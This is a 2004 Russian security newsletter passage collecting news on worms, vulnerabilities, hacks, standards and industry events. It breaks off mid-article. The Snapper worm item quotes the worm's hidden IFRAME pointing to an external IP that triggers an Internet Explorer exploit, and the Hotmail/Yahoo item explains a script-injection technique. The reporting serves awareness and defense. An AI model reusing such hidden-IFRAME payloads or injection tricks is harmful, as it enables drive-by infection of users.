uinC NewsLetter #13, 2004


Приветствуем!

Новости Нашего Сайта

22/03/2004 16:06 На сайте новая статья: Эмуляция программного кода.
Документ содержит теоретическую и практическую информацию, посвященную основам разработки эмуляторов программного кода и их использованию в антивирусных программах.
Ознакомиться: http://www.uinc.ru/articles/47/



Новости из Security Мира

22/03/2004 12:38 В интернете появится домен "только для взрослых".
Корпорация по распределению номеров и имен в Интернете (ICANN) заканчивает во вторник принимать заявки на новые доменные имена, сообщает CNN. Желание стать спонсорами доменов, предназначенных для отдельных видов деятельности, выразили уже 10 организаций, каждая из которых внесла по 45 тысяч долларов за подачу заявки. В течение апреля ICANN будет проводить публичное обсуждение предлагаемых нововведений, а в мае независимое жюри рассмотрит поданные заявки, и для одобренных им доменов будут разработаны специальные условия, на основании которых физические и юридические лица смогут регистрировать свои интернет-адреса в особых доменных зонах. Например, доменное имя ".ххх" спонсируется Международным фондом за сетевую ответственность, который планирует бороться с детской порнографией, контролируя содержание сайтов с "развлечениями для взрослых". Сайты, адрес которых будет иметь окончание ".mobi", будут предоставлять услуги пользователям мобильного интернета, среди которых владельцы ноутбуков и сотовых телефонов, работающих в протоколе WAP. Кроме этого, поступили заявки на такие доменные имена, как ".asia", ".cat", ".jobs", ".mail", ".post", ".tel" и ".travel".
Источник - http://www.cnn.com/2004/TECH/internet/03/20/new.domains.ap/index.html

22/03/2004 13:11 Недельный отчет о вирусах Panda Software.
Выпущен традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. Рассмотрены два червя: пять версий червя Bagle и две Netsky. Честно говоря, не совсем понятно - почему по-прежнему ни одна российская антивирусная компания не опубликовала новость о появлении трояна Witty, о котором мы сообщали вчера.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=255

22/03/2004 13:46 IBM накачает Power на будущем мероприятии.
Впервые за длительное время компания расскажет о планах дальнейшего развития семейства своих процессоров. Отделение процессоров IBM, отвечающее за серверные чипы PowerPC и Power, обещает сделать это на специальном мероприятии в Нью-Йорке 31 марта. Ожидается, что топ-менеджеры компании расскажут о семействе процессоров Power и других проектах. Вероятно, темой обсуждения станут будущие процессоры, такие как Power 5 и Cell — совместная разработка IBM, Sony и Toshiba. Возможно, появится новая информация и о некоторых существующих процессорах PowerPC. Компания делает регулярные анонсы своих чипов, однако Motorola и другие конкуренты уделяют маркетингу процессоров гораздо больше внимания. Например, Intel и Motorola регулярно проводят конференции для разработчиков, которые используют для распространения информации о своих чипах в ИТ-индустрии и СМИ. Недавно IBM внесла ряд изменений в свой бизнес процессоров, включая выпуск новых моделей, создание производства на заказ и объединение отделения микроэлектроники с отделением серверов в рамках нового подразделения Systems and Technology Group. Аналитики считают это частью стратегии, направленной на лучшее ознакомление людей с семейством процессоров Power.
Подробности - http://www.zdnet.ru/?ID=428787

22/03/2004 14:08 Стандарты "голосового Web".
Консорциум W3C присвоил статус "рекомендуемых" спецификациям VoiceXML 2.0 и Speech Recognition Grammar Specification (SRGS). На данный момент две эти спецификации - единственные относящиеся к интерактивным речевым системам, ратифицированные независимой организацией по стандартизации. VoiceXML представляет собой язык описания доступных через телефоны интерактивных голосовых Web-служб, реализующих функции синтеза, записи и распознавания речи, а также распознавания голосовых и DTMF-команд. SRGS, в свою очередь, стандартизует способ указания слов и шаблонов слов, на которые должна реагировать система распознавания. VoiceXML предусматривает использование SRGS, а вместе они являются первыми компонентами Speech Interface Framework - разрабатываемого в W3C универсального набора языков разметки для интерактивных речевых приложений.
Источник - http://www.osp.ru

22/03/2004 14:20 Nokia, Philips и Sony продвигают новый стандарт беспроводной связи.
Компании Nokia, Philips и Sony учредили некоммерческую организацию NFC Forum, основная задача которой будет заключаться в продвижении нового стандарта беспроводной связи ближнего радиуса действия NFC (Near Field Communication). Чипы NFC используют частотный диапазон 13,56 МГц и позволяют передавать информацию на расстояние до нескольких сантиметров. Максимальная пропускная способность при этом составляет 424 кбит/с, минимальная - 106 кбит/с. Понятно, что с такими характеристиками беспроводная связь NFC вряд ли сможет заменить Wi-Fi или Bluetooth, однако участники NFC Forum уверены, что новый стандарт уже в ближайшие годы получит самое широкое распространение. В частности, микросхемы NFC планируется устанавливать в сотовые телефоны и коммуникаторы, карманные компьютеры и ноутбуки, телевизоры, аудиосистемы и прочую бытовую технику. В этом случае, к примеру, владелец портативного видеоплеера смог бы загрузить новые фильмы в память устройства, просто поднеся его к портативному компьютеру или десктопу. Аналогичным образом МР3-композиции могли бы передаваться с плееров на стационарные музыкальные центры, а сделанные при помощи встроенных в мобильники камер снимки - на телевизоры.
Источник - http://www.compulenta.ru

22/03/2004 14:42 Московские провайдеры увеличивают емкость международных каналов.
Московские телекоммуникационные компании "Караван" и "Комстар" сообщили о расширении международный каналов доступа в глобальную сеть интернет. "Караван" увеличил емкость каналов в полтора раза до 100 Мбит/с, "Комстар" - до 105 Мбит/с. Увеличиние емкости достигнуто за счет модернизации сети компании TeliaSonera, предоставляющей услуги международной связи. Причиной расширения канала стал возросший объем трафика, проходящего через сети компаний. Рост объема трафика происходит за счет притока новых корпоративных клиентов.
Источник - http://www.provider.net.ru

22/03/2004 14:51 Американский "Эшелон" бдит пуще прежнего.
Ещё одна статья о знаменитой системе "Эшелон", созданной в США. Статья, авторами которой являются Владимир Иванов и Владимир Яременко, описывает структуру и состав системы "Эшелон" на сайте "Независимого военного обозрения". Впервые информация об "Эшелоне", управление которым осущесствляет АНБ (Агентство национальной безопасности), появилась в конце 90-х годов. В одном из американских изданий была опубликована информация о том, что США в сотрудничестве с Великобританией, Канадой, Австралией и Новой Зеландией приступили к созданию глобальной сети перехвата и анализа всех электронных средств связи - телефонной - обычной и сотовой, факсимильной, телексной, интернета и электронной почты. Кроме того, в ее поле видимости попадали и системы кабельной связи, проложенные по морскому дну между континентами. В "Эшелон" входит около 120 спутников связи, разведки и слежения, часть которых располагается на геостационарных орбитах. Собираемая информация направляется в память самых современных суперкомпьютеров, в которых осуществляется ее расшифровка. Она пропускается через так называемые "Словари Эшелона" - постоянно обновляемые базы ключевых слов. В них включаются имена людей, названия кораблей, организаций, стран, а также некоторые специальные термины. Ключами служат номера телефонов и факсов, электронные адреса в интернете, принадлежащие частным лицам, бизнесменам, организациям или правительственным службам. Кроме того, в состав "Эшелона" входят корабли слежения и приемопередающие станции, принадлежащие соответствующим организациям стран - участниц проекта, включая Директорат связи МО Австралии, Национальное бюро безопасности связи Новой Зеландии и канадское Управление закрытой связи.
Статья - http://nvo.ng.ru/spforces/2004-03-19/7_madrid.html

22/03/2004 15:19 Выход Rootkit Hunter 1.0.0.
Вышла новая версия ещё одного сканера руткитов (закладок) в открытых системах, сообщается на linux.org.ru. Возможности: ищет файлы, используемые популярными руткитами, проверяет права доступа к файлам, умеет запоминать MD5 и отслеживать измененные файлы, ищет скрытые файлы, проверяет модули на наличие сигнальных строк, умеет сканировать все подряд бинарные/текстовые файлы. Последняя опция будет особенно востребована пользователями антивируса Касперского, недавно перешедшим на Linux.
Подробности - http://www.rootkit.nl/projects/rootkit_hunter.html

22/03/2004 16:34 IT: безопасность против преступности.
Любители обогатиться или просто немного развлечься при помощи высоких технологий предпочли не мелочиться. Недавно они выбрали своей мишенью крупнейший в Эстонии банк "Хансапанк". Как заявил журналистам пресс-секретарь финансового учреждения, банк подвергся атаке хакеров. Специалисты в этом вопросе полагают, что действия злоумышленников можно расценить как крупнейшее в странах Балтии нападение на банковские интернет-терминалы. По данным представителя пострадавшей стороны, на электронный адрес банка в 13 и 14 марта 2004 года были направлены тысячи запросов, что в конечном итоге привело к перегрузке портала банка и временному прекращению доступу в систему "Интернет-банк" зарубежных клиентов. К счастью, техническому персоналу "Хансапанк" удалось оказать злоумышленникам достойный отпор. Крупномасштабная атака хакеров была нейтрализована благодаря современным защитным технологиям банка. При этом личная информация и сбережения клиентов "Хансапанк" в результате атаки не пострадали. Руководство банка уже подало заявление в полицию с требованием возбудить уголовное дело по факту хакерской атаки.
Источник - http://www.crime-research.ru

23/03/2004 10:48 ЕС оштрафует Microsoft на 497 миллионов евро.
Европейский союз наложит на корпорацию Microsoft штраф в 497 миллионов евро (613,5 миллиона долларов), сообщает Reuters. Об этом в понедельник заявил источник в антимонопольной комиссии ЕС. Как ожидается, в среду решение о применении к Microsoft штрафных санкций, будет единогласно принято членами комиссии. В этом случае, штраф, наложенный на компанию Билла Гейтса, станет самым крупным за историю ЕС. Антимонопольная комиссия ЕС обвинила Microsoft в намеренном ограничении доступа потребителей к аудио-визуальному программному обеспечению других компаний. Кроме штрафа, решением Антимонопольной комиссии ЕС, Microsoft будет обязана выпустить на рынок операционную систему Windows, в которую не будет включен проигрыватель Windows Media Player. По мнению комиссии, такая версия операционной системы стимулирует появление других мультимедийных программ для Windows, выпущенных конкурентами Билла Гейтса. Руководство Microsoft уже объявило решение о наложении такого крупного штрафа незаконным, и объявило, что будет оспаривать наложение штрафа в судебном порядке.
Подробности - http://cnn.netscape.cnn.com/ns/news/story.jsp?...

23/03/2004 11:24 Бета-версия Mozilla 1.7.
Сообщество разработчиков Mozilla.org выпустило бета-версию коммуникационного пакета Mozilla 1.7, включающего браузер, почтовый клиент, редактор HTML и клиент IRC. Напомним, что сейчас проект Mozilla развивается по двум направлениям: интегрированный коммуникационный пакет (Mozilla 1.x) и набор автономных приложений (браузер Firefox, почтовый клиент Thunderbird). В перспективе, именно второе направление станет основным. В Mozilla 1.7 разработчики реализовали немало нововведений. Еще в альфа-версии, выпущенной в феврале, были усовершенствованы функции блокировки всплывающих окон, добавилась долгожданная полноценная поддержка нескольких почтовых аккаунтов в почтовом клиенте. До этого почта могла приниматься из нескольких ящиков, но отправлялась только через один SMTP-сервер, используя только один из доступных адресов. При использовании нескольких почтовых ящиков это создавало путаницу, и теперь при отправке письма можно выбирать нужный аккаунт из выпадающего списка. В бета-версии Mozilla 1.7 появилась опция, позволяющая отключать задействованную на некоторых сайтах блокировку контекстного меню с помощью javascript, были переделаны диалоги при работе с "куками", и появилась возможность просмотра сохраненных паролей (для этого пользователю нужно задать еще один пароль, открывающий текст, спрятанный за звездочками). В почтовом клиенте появилась поддержка IMAP IDLE, технологий MSN Authentication и Secure Password Authentication для доступа к почтовым ящикам по протоколам POP3 и IMAP.
Источник - http://www.lenta.ru

23/03/2004 11:40 VIA представила бесплатную утилиту для безопасности файлового обмена.
VIA Technologies объявила о выпуске программного пакета VIA Padlock Security, включающего утилиту безопасной корпоративной связи и набор инструментальных средств для разработки, которые обеспечивают открытую и масштабируемую структуру для обеспечения безопасных коммуникационных решений для корпоративных условий. Представленный как часть инициативы безопасности VIA Padlock, пакет VIA PadLock Security является инструментом, который позволяет вести чат и обеспечивает функциональность двухстороннего файлового обмена при помощи усовершенствованной PGP-модели публичного ключа и шифрованию AES, что дает возможность создания безопасных путей сообщения между пользователями. Пакет VIA PadLock Security полностью совместим со средами семейства ОС Microsoft Windows и Linux, а также совершенствует процедуру генерирования случайных чисел и возможности шифрования AES, встроенного в последнее ядро «C5P Nehemiah» процессоров VIA Eden, VIA C3 и VIA Antaur. Утилита VIA PadLock SL предлагается для свободного скачивания с сайта VIA, доступны версии под Windows и Linux под GNU (не Unix) публичной лицензии. Утилита будет функционировать на любой системе x86, но оптимизирована для использования с последними процессорами VIA Eden, VIA C3 и VIA Antaur, оснащенными ядром С5P Nehemiah.
Источник - http://www.cnews.ru

23/03/2004 12:13 Караван" (Москва) отвергает обвинения в поддержке террористов.
Московская компания "Караван" распространила вчера следующее заявление: "Компания "Караван" не причастна к поддержке сайта палестинских террористов. 22 марта 2004 в газете "Новые Известия" и на некоторых других информационных ресурсах, прошла информация о том, что компания "Караван" разместила на своих мощностях сайт террористической организации ХАМАС. Компания "Караван" официально заявляет, что сайт с IP адресом 217.23.144.158 не размещается на серверах "Каравана". Этот сайт был размещен в дата-центре "Каравана" на одном из многочисленных серверов клиентов. Согласно договору оферты "Караван" не контролирует информацию, размещаемую на серверах наших клиентов и не несет ответственность за информационное содержание сайта. Более того, "Караван" предоставляет технические возможности для функционирования серверов. Администрирование и контроль ресурсов осуществляется клиентами самостоятельно. Именно поэтому в заключаемом с клиентом договоре отдельно оговаривается, что всю ответственность за размещаемую на сервере информацию клиент несет индивидуально. Согласно договору клиенту запрещается размещать информацию, противоречащую законодательству РФ, а именно нарушение авторских прав, пропаганда насилия и т.д. Для контроля факта нарушения законодательства РФ у государства существуют соответствующие институты. При поступлении в "Караван" официального запроса от правоохранительных органов, компания предоставит любую необходимую информацию. Компания "Караван" выражает недоумение по поводу информации о причастности к размещению на собственных ресурсах информации, пропагандирующей терроризм. "Караван", очень дорожит своей высокой репутацией и считает необходимым опубликования официального опровержения публикаций, содержащих порочащие и недостоверные сведения о связи с размещением информации, пропагандирующих терроризм".
Источник - http://www.caravan.ru/news.html?...

23/03/2004 13:07 Sun планирует выпустить трехмерный Linux-десктоп.
Sun Microsystems, начала работы над экспериментальным проектом - Looking Glass. Это будет десктоп нового поколения для Linux. Планируются обсуждение проекта с Linux community на X Windows Systems Developer's Meeting в конце апреля.
Подробности - http://www.linuxplanet.com/linuxplanet/reports/5303/1/

23/03/2004 14:20 Создан сайт российской киберполиции.
Создан российский Научно-информационный сайт "Компьютерная преступность и борьба с нею", cообщает crime-research.ru. Сайт состоит из следующих разделов: система защиты информации в России; законодательство в сфере информации, информатизации и защиты информации; понятие и классификация компьютерных преступлений; антология компьютерных преступлений в России; всё о компьютерных правонарушителях; подразделения по борьбе с компьютерными преступлениями в России; понятие и назначение «СОРМ»; библиотека публикаций; форум. Кстати, ранее у подобного подразделения существовал сайт www.cyberpolice.ru, но в настоящий момент на нём крутится сайт, посвящённый борьбе со спамом.
Сайт - http://www.cyberpol.ru/

23/03/2004 15:01 Сайт с документацией по системам.
Копаясь тут по закладкам и старым ссылкам обнаружил довольно неплохой и, главное, очень полезный сайт Dreamcatcher.ru, на котором выложены очень интересные статьи по тематике FreeBSD, CISCO, Win2K, VoIP. Представлены следующие разделы: операционные системы, сервисы и службы, программирование в *nix, маршрутизаторы и коммутаторы CISCO, общие вопросы, Windows2000. основная часть статей выложена на самоом сервере, часть представлена ссылками. Рекомендуем ознакомиться со списком и почитать то, что вас заинтересовало.
Сайт - http://www.dreamcatcher.ru/statiy.html

23/03/2004 15:43 Выход Linux Netwosix 1.1.
Vincenzo Ciaglia анонсировал выход очередной версии одного из многочисленных дистрибутивов Linux - Linux Netwosix 1.1. Как пишет сам автор, этот дистрибутив представляет собой оптимизированный для серверов Linux c упором на работу с сетью по защищзённым протоколам. В новой версии убраны различные баги, обнаруженные в версии 1.0. При этом сообщается, что механизм обновления (апдейта) на настоящий момент не работает (обещают устранить это в новой версии) и поэтому систему надо ставить с нуля. В новую версию включены: ядро 2.6.4; системные бинарники, слинкованные с билиотекой glibc 2.3.2; возможность инсталляции из двух источников - .tgz и .tar.gz, Iptables 1.2.7a, компилятор gcc 3.3.2; Perl 5.8.2 и др. При этом размер установленного дистрибутива не превышает 450 мегабайт. Опционально могут устанавливаться: XFre86 в качестве X-сервера, Apache 2.0.48 в качестве Вэб-сервера, поддержка шифрования сетевого трафика при помощи OpenSSL etc.
Подробности - http://www.netwosix.org/

23/03/2004 17:12 Перерождение проекта FreeS/WAN.
В начале марта было опубликовано объявление о закрытии проекта FreeS/WAN (IPSEC и IKE для Linux), но все оказалось не так мрачно - проект практически сразу подхватили другие разработчики и создали на его основе новую ветку - Openswan, cообщает opennet.ru.
Подробности - http://slashdot.org/article.pl?sid=04/03/23/0222229

23/03/2004 17:50 Модернизация интернета продвигается вперед.
Интернет следующего поколения — Internet Protocol version 6 — сделал еще один важный шаг на пути к коммерциализации: на прошлой неделе завершился второй этап его испытаний в Северной Америке. Используемая для испытаний сеть Moonv6 представляет собой магистраль IPv6, построенную совместными усилиями лаборатории InterOperability Laboratory (IOL) при Университете штата Нью-Гэмпшир, North American IPv6 Task Force, Internet2, Министерства обороны США и свыше 40 поставщиков сетевого оборудования, испытателей и сервис-провайдеров. Виртуальная магистраль IPv6 протянулась от Нью-Гэмпшира до Калифорнии и будет работать постоянно, так что теперь производители оборудования, поставщики ПО, сервис-провайдеры и все остальные, кто желает проверить взаимодействие своих продуктов с IPv6, могут сделать это в действующей сети. В продолжение двух недель марта North American IPv6 Task Force, Объединенная группа тестирования на совместимость Агентства оборонных информационных систем и другие организации проводили испытания на качество обслуживания сети, безопасность, управление приложениями, функционирование сетевых протоколов и сквозную работу сервера доменных имен со всеми основными операционными системами.
Подробности - http://zdnet.com.com/2100-1104_2-5177463.html

24/03/2004 12:26 Американские спецслужбы поймали хакера, шантажировавшего Google.
Секретная служба США (U.S. Secret Service) арестовала программиста из американского штата Калифорния по подозрению во взломе рекламной системы AdSense компании Google, сообщает интернет-издание InternetNews.com со ссылкой на газету Wall Street Journal. Система AdSense, интегрированная с поисковой машиной Google, предназначена для организации рекламных площадок на сайтах-участниках. Владельцы сайтов, присоединившиеся к системе, отводят на своих страницах рекламное место для баннеров AdSense, а система подбирает для показа там проплаченную рекламу, содержание которой близко содержанию сайта. Таким образом посетители сайтов определенной тематики видят на них рекламу соответствующей тематики, и, следовательно, более заинтересованы в переходе на рекламируемые таким образом сайты. Таким образом сайты-рекламодатели получают целевую аудиторию, заинтересованную в их продукте, а владельцы сайтов-участников AdSense получают отчисления за переходы пользователей по рекламным баннерам. 32-летний калифорниец Майкл Брэдли (Michael Bradley), как предполагают следственные органы, создал программу Google Clique, которая имитирует массовые переходы пользователей по таким баннерам, способствуя накоплению денег на счетах участников AdSense. Изначально Брэдли делал программу для неизвестного заказчика, однако он отказался платить, после чего Брэдли в начале марта связался с представителями Google и потребовал от них 100 тысяч долларов. В противном случае программист грозил начать продажи своей программы спаммерам, что, по его мнению, дискредитировало бы и систему AdSense, и Google.
Подробнее - http://www.clickz.com/news/article.php/3329381

24/03/2004 13:05 Появление очередной разновидности червя Netsky.
"Лаборатория Касперского" сообщает об учащении случаев заражения новой версией почтового червя I-Worm.NetSky.q. Данная версия была обнаружена 21 марта, однако лишь теперь уровень её распространенности превысил критическую отметку. Червь распространяется через интернет в виде вложений в зараженные электронные письма. Также червь обладает функцией размножения через P2P-сети и доступные HTTP и FTP каталоги. Основной компонент червя представляет собой PE EXE-файл, размером около 29KB. Червь упакован FSG, размер распакованного файла около 40KB.
Характеристики зараженных писем Зараженные письма формируются из произвольных комбинаций. Адрес отправителя выбирается произвольно из числа найденных на зараженной машине. Тема формируется из набора заготовок. То же самое касается и текста письма. Также червь может дописывать в конец зараженного письма ложное сообщение о том, что данное письмо было проверено каким-либо антивирусом. Имя вложения имеет множество различных вариантов. Зачастую это файлы с двойным расширением, где первое "doc" или "txt", а второе выбирается из списка: .exe, .pif, .scr. Также червь способен посылать свои копии в виде ZIP-архивов. Червь может посылать письма, содержащие IFRAME Exploit (аналогично червям Klez.h или Swen). В таком случае, при просмотре письма из уязвимого почтового клиента, произойдет автоматический запуск вложенного файла червя.
Источник - http://www.kaspersky.ru

24/03/2004 13:23 Появление червя Snapper.
"Лаборатория Касперского" сообщает об обнаружении нового почтового червя I-Worm.Snapper, распространяющегося через интернет в виде ссылки на зараженный веб-сайт. Зараженные письма содержат в себе HTML код: <HTML><BODY><IFRAME src='http://198.170.245.129/[censored by KL].htm'
style='display:none'></IFRAME></HTML></BODY>. При обращении по данной ссылке происходит использование уязвимости Internet Explorer, описанной в бюллетене MS03-040, в результате чего в системе исполняется скриптовый троянец. Данная троянская программа извлекает из себя и устанавливает в систему основной файл червя "IELOAD.DLL". Червь представляет собой PE DLL-файл, размером около 8KB (8704 байт). Данный файл устанавливается в системный каталог Windows и запускается как системная библиотека. Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook. Для отправки писем червь использует указанный в системе SMTP сервер. Подробное описание червя появится в ближайшее время.
Исчтоник - http://www.viruslist.com

24/03/2004 13:51 Сайт RIAA снова выведен из строя.
В течение пяти дней с 17 по 22 марта в интернете не был доступен официальный сайт Американской ассоциации звукозаписывающих компаний (RIAA). Эта организация известна своим нетерпимым отношением к распространению музыки через интернет. Главной головной болью RIAA являются файлообменные сети, которые она безуспешно пытается преследовать в суде. В начале 2003 года протестующие против действий RIAA хакеры успешно атаковали сайт этой организации чуть ли не еженедельно. Однако со временем RIAA навела порядок в администрировании сайта, и его взломы практически прекратились. Тем не менее, в середине марта сайт, находящийся по адресу www.riaa.com снова вышел из строя. В этот раз, однако, в случившемся винят не просто хакеров, а авторов вируса MyDoom.F - относительно нового варианта червя, вызвавшего мощнейшую эпидемию в январе-феврале нынешнего года. Этот вирус запрограммирован таким образом, чтобы организовывать DoS-атаки на сайты Microsoft и RIAA с 17 по 22 число каждого месяца. И хотя именно в этот временной период сайт Американской ассоциации звукозаписывающих компаний был недоступен, остается неясным, вывела ли его из строя DoS-атака, или администраторы решили отключить серверы на опасный период. В самой RIAA ситуацию с сайтом никак не комментируют, но в настоящее время он функционирует нормально.
Подробности - http://story.news.yahoo.com/news?tmpl=story...

24/03/2004 14:16 Сайт Gnome.org подвергся хакерской атаке.
Команда системных администраторов сайта Gnome.org сообщила о проникновении неизвестных хакеров на сервер, где расположен ресурс, утверждает "Компьюлента". В настоящее время проводится расследование, однако администраторы сайта утверждают, что исходные тексты менеджера рабочего стола для Linux, выложенные на сервере, не пострадали. Подобные хакерские атаки на серверы с исходными кодами открытого программного обеспечения опасны, прежде всего, возможностью внесения злоумышленниками изменений в программный код ПО. В частности, в исходники программ может быть встроен код программ-шпионов или вирусов. Если вовремя не пресечь хакерское вторжение в код ПО, то измененная версия пакета программ может распространиться по сети среди пользователей и появиться на сайтах-зеркалах. На сайте Slashdot отмечают, что хакерская атака может неблагоприятно сказаться на сроке выхода следующей версии менеджера рабочего стола Gnome 2.6, который назначен на сегодня.
Подробности - http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

24/03/2004 14:29 CHU-600: новый сетевой PowerLine USB-адаптер.
Довольно интересная новость о довольно необычном (вернее, не получившим в настоящее время широкого распространение) сетевом устройстве. Компания MAS Elektronik AG начинает поставки в Россию и страны СНГ новой модели Powerline USB-адаптера CHU-600. Это устройство обеспечивает быструю организацию локальной вычислительной сети на основе стандартной электропроводки. Устройство CHU-600 основано на новой телекоммуникационной технологии Power Line Communication (PLS), позволяющей строить ЛВС с использованием электрической проводки 100-230В в пределах комнаты, этажа или здания. Адаптер соответствует спецификации Homeplug Powerline Specification 1.0, обеспечивает скорость передачи данных до 14 Мбит/с и имеет высокую устойчивость к электропомехам. Наличие режима шифрования трафика по DES с 56-битным ключом позволяет предотвращать несанкционированный доступ в существующую сеть, обеспечивая более высокую безопасность, чем беспроводные сети Ethernet. Новинка может работать с большинством современных операционных систем MS Windows 98SE/ME/2000/XP. Встроенная функция Quality of Service (QoS) обеспечивает приоритеты доступа. Наличие световых индикаторов позволяет отслеживать функционирование устройства. Ориентировочная стоимость около 60 уёв.
Подробности - http://www.nestor.minsk.by/sr/news/2004/03/4031602.html

24/03/2004 15:03 Microsoft перейдёт на новую версию управления патчами.
Количество выпускаемых исправлений и обновлений для продуктов Microsoft увеличивается стремительными темпами. Добавим к этому различные инфрастуктуры наложения заплаток на разные продукты, специальные языковые версии пакетов обновлений и отличия в самих продукта -- получим кошмар системного администратора. Заметим, что на сегодняшний день для управления заплатками существует несколько продуктов и служб: Microsoft Windows Update, Microsoft Baseline Security Analyzer (MBSA), Microsoft Software Update Services (SUS) и Microsoft Systems Management Server (SMS) с SMS SUS Feature Pack. Настало время упорядочить все это хозяйство, поэтому (по слухам) Microsoft собирается к началу 2004 года выпустить унифицированное средство управления исправлениями (patch management). С теоретической точки зрения должна быть сформирована единая архитектура латания всех продуктов, а с практической - новые версии Windows Update, MBSA, SUS и SMS SUS Feature Pack. В первом квартале 2004 предполагается разработать архитектуру и новую версию Windows Update для всех продуктов Microsoft, а во втором - новые версии MBSA, SUS и SMS 2003. К концу 2004 планируется сократить число типов установки заплаток с восьми до двух (Windows Installer-MSI-3.0 и Update.exe), а в начале 2005 появится SMS 2005, Microsoft System Center и новая версия SUS. Появилась первая версия кандидата на выпуск Microsoft Systems Management Server (SMS) 2003 Release Candidate 1 (RC 1), согласованная с Windows Small Business Server (SBS) 2003 и Microsoft Office Real-Time Communications (RTC) Server 2003 (которые тоже достигли уровня RC), а также с почти готовым сервером Microsoft Exchange Server 2003. Согласно рекламе Microsoft: "SMS 2003 обеспечивает поддержку мобильных коммуникаций с переносными ПК и перемещаемыми профилями пользователей, а также тесную интеграцию с компонентами Windows 2000, например Active Directory". Поставки SMS 2003 начнутся в сентябре.
Источник - http://www.itunion.ru/

24/03/2004 15:25 Novell открыла исходный код iFolder.
Novell представила исходный программный код iFolder, который ляжет в основу следующей корпоративной версии Novell iFolder и других будущих продуктов для коллективной работы. Теперь заказчики смогут легко подогнать iFolder к своим потребностям или добавить в него новые функции, не дожидаясь очередного выпуска продукта Novell. Код будет предложен широкой публике на условиях GNU General Public License (GPL). Novell сохранит авторские права на код, чтобы иметь возможность распространять будущие продукты на базе этого кода по традиционным коммерческим лицензиям Novell. iFolder состоит из 3 программных компонентов: механизма синхронизации и хранилища данных Simias, на котором основан Novell iFolder, адресной книги, которую iFolder использует для обмена информацией об учетных записях, и собственно iFolder, который использует как Simias, так и адресную книгу. iFolder представляет собой простое решение, которое позволяет обращаться к персональным файлам, управлять ими и создавать резервные копии в любое время и из любого места. Пользователи просто сохраняют файлы локально, а iFolder автоматически копирует и синхронизирует их на любые другие указанные машины. Например, находясь в офисе, пользователь сохраняет файл, и тот через iFolder автоматически копируется в его домашний компьютер. На всех машинах, с которыми работает пользователь, хранятся самые последние версии всех файлов. Источник - CNews

24/03/2004 18:12 Уязвимость почтовых систем Hotmail и Yahoo.
Компания GreyMagic Software из Израиля сообщает об обнаружении уязвимости в известнейших Вэб-ориентированных почтовых системах Hotmail и Yahoo. Наличие уязвимости позволяет сделать довольно много неприятных вещей: похитить конфиденциальные данные (в том числе логин-пароль), просмотреть содержимое почтового ящика, автоматически посылать почтовые сообщения из почтового ящика жертвы, используя уязвимости браузеров получить доступ к файловой системе жертвы, рассылать через почту черве-вирусов, получить полный доступ к контактному листу в адресной книге. Сама природа уязвимости связана с так называемой функцией HTML+TIME (основаны на SMIL), отвечающей за взаимодействие мультимедийных компонентов с тэгами HTML. При помощи технологии TIME (Timed Interactive Multimedia Extensions) можно, например, синхронизировать проигрывание звуковых файлов с прокруткой текстовых блоков и изображений и просматривать такой документ в любом браузере. Однако, как указывается в документе эта технология наиболее широко используется "браузером всех времён и народов" Internet Explorer-ом, дрывость которого уже давно стала непреложной истиной. Непосредственно уязвимость связана с атрибутами элемента <t:set>. Атрибуты "attributeName" и "to" этого элемента позволяют внедрить ЛЮБОЙ HTML-код в документ, в случае равенства первого "innerHTML". Собственно, сам код HTML как раз и внедряется при этом при помощи атрибута "to" (в том числе и скрипты). Для проведения атаки злодею необходимо отправить жертве составленное определенным образом письмо. При прочтении такого сообщения через веб-интерфейс почтовой службы посредством браузера Internet Explorer на компьютере будет выполнен произвольный программный код. Как отмечает GreyMagic, как ни странно, Microsoft (хозяин хотмыла) среагировала в течении 2-х дней после сообщения уязвимости и залатала дыру. Yahoo же никак не прореагировала и до сих пор её Вэб-почта обладает уязвимостью. Также сообщается, что возможно существование уязвимости в других Вэб-ориентированных почтовых системах. По ссылке, опубликованной ниже также содержится демонстрационный код.
Подробности - http://www.greymagic.com/security/advisories/gm005-mc/

25/03/2004 12:09 Microsoft обвинила ЕС в нарушении авторских прав в ответ на рекордный штраф.
Руководство Microsoft заявило о нарушении своих прав на интеллектуальную собственность в связи с решением Антимонопольной комиссии ЕС, которая оштрафовала компанию на 497 миллионов евро, передает агентство Reuters. Как сообщил вице-президент и главный юрист компании Брэд Смит (Brad Smith), Microsoft подаст жалобу в Европейский суд справедливости и потребует отменить штраф до рассмотрения апелляции. При этом Смит заверил, что решение Антимонопольной комиссии ЕС не повлияет на разработку новой операционной системы Microsoft Longhorn. Антимонопольная комиссия ЕС обвинила Microsoft в намеренном ограничении доступа потребителей к аудио-визуальному программному обеспечению других компаний. По решению комиссии, Microsoft должна в течение 90 дней представить версию операционной системы Windows без программы Media Player. Комиссия также обязала компанию в течение 120 дней предоставить своим конкурентам достаточную информацию для того, чтобы выпускаемые ими серверы могли работать под Windows.
Источник - http://lenta.ru

25/03/2004 12:34 Как мы сами себе рассылаем спам.
"Зомбированные" вследствие нашей небрежности домашние компьютеры все активнее участвуют в массовых рассылках e-mail - спама. Без ведома своих хоязеев, разумеется. По прогнозам аналитиков, еще до середины нынешнего года доля спама может достичь 70% почтового трафика. Несмотря на техническое противодействие компаний потоку спама и принятие законов против него, положение не улучшается. Спамеры адаптируются, изыскивая новые возможности для почтовых рассылок. Организаторы таковых имеют в отличие от вирусописателей серьезный материальный стимул: то, чем они занимаются, - хотя и подпольный, но все же бизнес. Один из важных ресурсов, задействованных спамерами, - домашние компьютеры, подключенные к Интернету. По сведениям Би-би-си, треть спама рассылается именно с использованием машин, которые установлены у нас дома. С распространением широкополосного доступа к Интернету как массовой услуги эта часть компьютерного парка стала легкой добычей хакеров. Квалифицированно эксплуатировать операционную систему, как это делается в локальных сетях компаний, в домашних условиях мало кто умеет, а благодаря пропускной способности канала передать можно значительные объемы данных. Технология, используемая для "зомбирования" домашних ПК, в точности та же, которая применяется авторами вирусов. Собственно, именно вирус, "почтовый червь", подготавливает домашние ПК к использованию в качестве источника спама. Первым из таких вирусов стал Sobig (январь 2003 года). За ним последовали Sinit, Fizzer и MyDoom. Эпидемия последнего в прошлом месяце стала самой масштабной в истории Интернета. Зараженные машины сами по себе не являются объектом атаки. Наоборот, вирус старается остаться незамеченным. Но инфицированные компьютеры (в случае с MyDoom таковых оказалось сотни тысяч, некоторые эксперты говорили о 